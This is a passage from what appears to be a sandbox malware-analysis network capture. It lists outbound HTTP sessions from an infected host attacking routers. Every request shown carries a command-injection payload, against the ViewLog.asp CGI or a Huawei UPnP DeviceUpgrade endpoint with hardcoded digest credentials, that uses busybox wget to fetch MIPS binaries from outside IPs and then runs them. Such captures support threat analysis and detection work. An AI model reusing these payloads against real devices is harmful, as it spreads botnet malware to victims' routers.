                                              Nov 23, 2023 05:17:49.606331110 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:58.566224098 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:18.278289080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              496192.168.2.133650494.69.201.2108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:40.979417086 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              497192.168.2.133741631.136.86.1598080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:41.119169950 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:44.230262995 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:50.374241114 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.406205893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              498192.168.2.1338024156.241.107.15037215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:41.143852949 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:43.110311031 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:45.510277987 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:50.374222040 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:59.846230030 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:20.326172113 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              499192.168.2.135220295.143.193.1528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:41.924123049 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              500192.168.2.134123695.217.165.1758080
                                              TimestampBytes transferredDirectionData
